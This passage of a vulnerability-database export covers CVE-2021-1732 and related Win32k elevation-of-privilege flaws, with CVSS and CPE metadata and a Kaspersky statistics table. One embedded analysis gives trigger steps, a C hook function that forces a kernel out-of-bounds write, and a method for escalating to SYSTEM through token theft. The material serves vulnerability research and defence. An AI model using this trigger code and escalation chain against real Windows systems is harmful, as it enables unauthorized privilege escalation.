adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 47.71 \n2 | Turkmenistan | 43.39 \n3 | Ethiopia | 41.03 \n4 | Tajikistan | 38.96 \n5 | Bangladesh | 36.21 \n6 | Algeria | 35.49 \n7 | Myanmar | 35.16 \n8 | Uzbekistan | 34.95 \n9 | South Sudan | 34.17 \n10 | Benin | 34.08 \n11 | China | 33.34 \n12 | Iraq | 33.14 \n13 | Laos | 32.84 \n14 | Burkina Faso | 32.61 \n15 | Mali | 32.42 \n16 | Guinea | 32.40 \n17 | Yemen | 32.32 \n18 | Mauritania | 32.22 \n19 | Burundi | 31.68 \n20 | Sudan | 31.61 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111505/15-en-malware-report-q1-2021-pc.png>))_\n\nOverall, 15.05% of user computers globally faced at least one **Malware-class** local threat during Q1.", "cvss3": {}, "published": "2021-05-31T10:00:05", "type": "securelist", "title": "IT threat evolution Q1 2021. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:05", "id": "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "href": "https://securelist.com/it-threat-evolution-q1-2021-non-mobile-statistics/102425/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-08-26T20:38:29", "description": "# CVE-2021-1732: win32kfull xxxCreateWindowEx callback out-of-bounds\n\nMar 25, 2021 \u2022 iamelli0t\n\nCVE-2021-1732 is a 0-Day vulnerability exploited by the BITTER APT\norganization in one operation which was disclosed in February this\nyear[1][2][3]. This vulnerability exploits a user mode callback opportunity in\nwin32kfull module to break the normal execution flow and set the error flag of\nwindow object (tagWND) extra data, which results in kernel-space out-of-bounds\nmemory access violation.\n\n## Root cause analysis\n\nThe root cause of CVE-2021-1732 is: \nIn the process of creating window (CreateWindowEx), when the window object\ntagWND has extra data (tagWND.cbwndExtra != 0), the function pointer of\nuser32!_xxxClientAllocWindowClassExtraBytes saved in\nntdll!_PEB.kernelCallbackTable (offset+0x58) in user mode will be called via\nthe nt!KeUserModeCallback callback mechanism, and the system heap allocator\n(ntdll!RtlAllocateHeap) is used to allocate the extra data memory in user-\nspace. \nBy hooking user32!_xxxClientAllocWindowClassExtraBytes function in user mode,\nand modifying the properties of the window object extra data in the hook\nfunction manually, the kernel mode atomic operation of allocating memory for\nextra data can be broken, then the out-of-bounds read/write ability based on\nthe extra data memory is achieved finally. \n\n\nThe normal flow of the window object creation (CreateWindowEx) process is\nshown as follows (partial): \n \n\n\nFrom the above figure, we can see that: when the window extra data size\n(tagWND.cbWndExtra) is not 0, win32kfull!xxxCreateWindowEx calls the user mode\nfunction user32!_xxxClientAllocWindowClassExtraBytes via the kernel callback\nmechanism, requests for the memory of the window extra data in user-space.\nAfter allocation, the pointer of allocated memory in user-space will be\nreturned to the tagWND.pExtraBytes property: \n \n\n\nHere are two modes of saving tagWND extra data address (tagWND.pExtraBytes): \n[Mode 1] **In user-space system heap** \nAs the normal process shown in the figure above, the pointer of extra data\nmemory allocated in user-space system heap is saved in tagWND.pExtraBytes\ndirectly. \nOne tagWND memory layout of Mode 1 is shown in the following figure: \n \n\n\n[Mode 2] **In kernel-space desktop heap** \nThe function ntdll!NtUserConsoleControl allocates extra data memory in kernel-\nspace desktop heap by function DesktopAlloc, calculates the offset of\nallocated extra data memory address to the kernel desktop heap base address,\nsaves the offset to tagWND.pExtraBytes, and modifies tagWND.extraFlag |=\n0x800: \n \n\n\nOne tagWND memory layout of Mode 2 is shown in the following figure:\n \n\n\nSo we can hook the function user32!_xxxClientAllocWindowClassExtraBytes in\nuser-space, call NtUserConsoleControl manually in hook function to modify the\ntagWND extra data storage mode from Mode 1 to Mode 2, call\nntdll!NtCallbackReturn before the callback returns: \n \n\n\nThen return the user mode controllable offset value to tagWND.pExtraBytes\nthrough ntdll!NtCallbackReturn, and realize the controllable offset out-of-\nbounds read/write ability based on the kernel-space desktop heap base address\nfinally. \n\n\nThe modified process which can trigger the vulnerability is shown as follows: \n \n\n\nAccording to the modified flowchart above, the key steps of triggering this\nvulnerability are explained as follows: \n\n 1. Modify the user32!_xxxClientAllocWindowClassExtraBytes function pointer in PEB.kernelCallbackTable to a custom hook function.\n 2. Create some normal window objects, and leak the user-space memory addresses of these tagWND kernel objects through user32!HMValidateHandle.\n 3. Destroy part of the normal window objects created in step 2, and create one new window object named 'hwndMagic' with the specified tagWND.cbwndExtra. The hwndMagic can probably reuse the previously released window object memory. Therefore, by searching the previously leaked window object user-space memory addresses with the specified tagWND.cbwndExtra in the custom hook function, the hwndMagic can be found before CreateWindowEx returns.\n 4. Call NtUserConsoleControl in the custom hook function to modify the tagWNDMagic.extraFlag with flag 0x800.\n 5. Call NtCallbackReturn in the custom hook function to assign a fake offset to tagWNDMagic.pExtraBytes.\n 6. Call SetWindowLong to write data to the address of kernel-space desktop heap base address + specified offset, which can result in out-of-bounds memory access violation.\n\nAn implementation of the hook function is demonstrated as follows: \n\n\n\u200b \n\n void* WINAPI MyxxxClientAllocWindowClassExtraBytes(ULONG* size) {\n \n \tdo {\n \t\tif (MAGIC_CBWNDEXTRA == *size) {\n \t\t\tHWND hwndMagic = NULL;\n \t\t\t//search from freed NormalClass window mapping desktop heap\n \t\t\tfor (int i = 2; i < 50; ++i) {\n \t\t\t\tULONG_PTR cbWndExtra = *(ULONG_PTR*)(g_pWnd[i] + _WND_CBWNDEXTRA_OFFSET);\n \t\t\t\tif (MAGIC_CBWNDEXTRA == cbWndExtra) {\n \t\t\t\t\thwndMagic = (HWND)*(ULONG_PTR*)(g_pWnd[i]);\n \t\t\t\t\tprintf(\"[+] bingo! find &hwndMagic = 0x%llx in callback :) \\n\", g_pWnd[i]);\n \t\t\t\t\tbreak;\n \t\t\t\t}\n \t\t\t}\n \t\t\tif (!hwndMagic) {\n \t\t\t\tprintf(\"[-] Not found hwndMagic, memory layout unsuccessfully :( \\n\");\n \t\t\t\tbreak;\n \t\t\t}\n \n \t\t\t// 1. set hwndMagic extraFlag |= 0x800\n \t\t\tCONSOLEWINDOWOWNER consoleOwner = { 0 };\n \t\t\tconsoleOwner.hwnd = hwndMagic;\n \t\t\tconsoleOwner.ProcessId = 1;\n \t\t\tconsoleOwner.ThreadId = 2;\n \t\t\tNtUserConsoleControl(6, &consoleOwner, sizeof(consoleOwner));\n \n \t\t\t// 2. set hwndMagic pExtraBytes fake offset\n \t\t\tstruct {\n \t\t\t\tULONG_PTR retvalue;\n \t\t\t\tULONG_PTR unused1;\n \t\t\t\tULONG_PTR unused2;\n \t\t\t} result = { 0 };\t\t\n \t\t\t//offset = 0xffffff00, access memory = heap base + 0xffffff00, trigger BSOD\t\n \t\t\tresult.retvalue = 0xffffff00;\t\t\t\n \t\t\tNtCallbackReturn(&result, sizeof(result), 0);\n \t\t}\n \t} while (false);\n \n \treturn _xxxClientAllocWindowClassExtraBytes(size);\n }\n\n\nBSOD snapshot: \n \n\n\n## Exploit analysis\n\nFrom Root cause anaysis, we can see that: \n**\" An opportunity to read/write data in the address which calculated by the\nkernel-space desktop heap base address + specified offset\"** can be obtained\nvia this vulnerability.\n\n\nFor the kernel mode exploitation, the attack target is to obtain system token\ngenerally. A common method is shown as follows: \n\n 1. Exploit the vulnerability to obtain a arbitrary memory read/write primitive in kernel-space.\n 2. Leak the address of some kernel object, find the system process through the EPROCESS chain.\n 3. Copy the system process token to the attack process token to complete the privilege escalation job.\n\nThe obstacle is step 1: How to exploit **\" An opportunity to read/write data\nin the address which calculated by the kernel-space desktop heap base address\n\n+ specified offset\"** to obtain the arbitrary memory read/write primitive in\n kernel-space. \n\nOne solution is shown in the following figure: \n \n\n\n 1. The offset of tagWNDMagic extra data (wndMagic_extra_bytes) is controllable via the vulnerability, so we can use SetWindowLong to modify the data in specified address calculated by desktop heap base address + controllable offset.\n 2. Use the vulnerability ability to modify tagWNDMagic.pExtraBytes to the offset of tagWND0 (the offset of tagWND0 is obtained by tagWND0+0x8), call SetWindowLong to modify tagWND0.cbWndExtra = 0x0fffffff to obtain a tampered tagWND0.pExtraBytes which can achieve read/write out-of-bounds.\n 3. Calculate the offset from tagWND0.pExtraBytes to tagWND1, call SetWindowLongPtr to replace the spMenu of tagWND1 with a fake spMenu by the tampered tagWND0.pExtraBytes, realize the arbitrary memory read ability with the help of fake spMenu and function GetMenuBarInfo. \n The logic of GetMenuBarInfo to read the data in specified address is shown as\n follows, the 16 bytes data is stored into MENUBARINFO.rcBar structure:\n  \n\n\n 4. Use the tampered tagWND0.pExtraBytes to modify tagWND1.pExtraBytes with specified address, and use the SetWindowLongPtr of tagWND1 to obtain the arbitrary memory write ability.\n 5. After obtaining the arbitrary memory read/write primitive, we need to leak a kernel object address in desktop heap to find EPROCESS. Fortunately, when setting the fake spMenu for tagWND1 in step 3, the return value of SetWindowLongPtr is the kernel address of original spMenu, which can be used directly.\n 6. Finally, find the system process by traversing the EPROCESS chain, and copy the system process token to the attack process to complete the privilege escalation job. This method is relatively common, so will not be described in detail.\n\nThe final privilege escalation demonstration: \n \n\n\n## References\n\n[1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732 \n[2] https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-\nzero-day-exploit-is-used-by-bitter-apt-in-targeted-attack-cn/ \n[3]\nhttps://www.virustotal.com/gui/file/914b6125f6e39168805fdf57be61cf20dd11acd708d7db7fa37ff75bf1abfc29/detection \n[4] https://en.wikipedia.org/wiki/Privilege_escalation", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T00:00:00", "type": "seebug", "title": "Microsoft Windows\u672c\u5730\u63d0\u6743\u6f0f\u6d1e\uff08CVE-2021-1732\uff09", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-03-26T00:00:00", "id": "SSV:99168", "href": "https://www.seebug.org/vuldb/ssvid-99168", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2021-11-10T18:37:14", "description": "In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "trendmicroblog", "title": "PurpleFox Adds New Backdoor That Uses WebSockets", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-10-19T00:00:00", "id": "TRENDMICROBLOG:B5EA1F5E613C3A15D832147CF064EC78", "href": "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T14:36:36", "description": "In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "trendmicroblog", "title": "PurpleFox Adds New Backdoor That Uses WebSockets", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-10-19T00:00:00", "id": "TRENDMICROBLOG:C9F6DD38959C2193331C83CA846C0A71", "href": "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-03-17T02:33:12", "description": "Win32k Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21882.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T08:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882", "CVE-2022-21887"], "modified": "2022-01-11T08:00:00", "id": "MS:CVE-2022-21887", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21887", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:33:13", "description": "Win32k Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21887.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T08:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882", "CVE-2022-21887"], "modified": "2022-01-13T08:00:00", "id": "MS:CVE-2022-21882", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21882", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:34:47", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-04-06T07:00:00", "id": "MS:CVE-2021-1732", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:47", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1732.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-02-09T08:00:00", "id": "MS:CVE-2021-1698", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1698", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:07:32", "description": "Win32k Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21882.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:15:00", "type": "cve", "title": "CVE-2022-21887", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882", "CVE-2022-21887"], "modified": "2022-01-19T16:58:00", "cpe": ["cpe:/o:microsoft:windows_11:-"], "id": "CVE-2022-21887", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21887", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-02-09T14:07:38", "description": "Win32k Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21887.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:15:00", "type": "cve", "title": "CVE-2022-21882", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882", "CVE-2022-21887"], "modified": "2022-05-23T17:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h2"], "id": "CVE-2022-21882", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21882", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*"]}, {"lastseen": "2023-02-09T14:02:59", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1732.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T23:15:00", "type": "cve", "title": "CVE-2021-1698", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-03-03T19:03:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2021-1698", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1698", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": 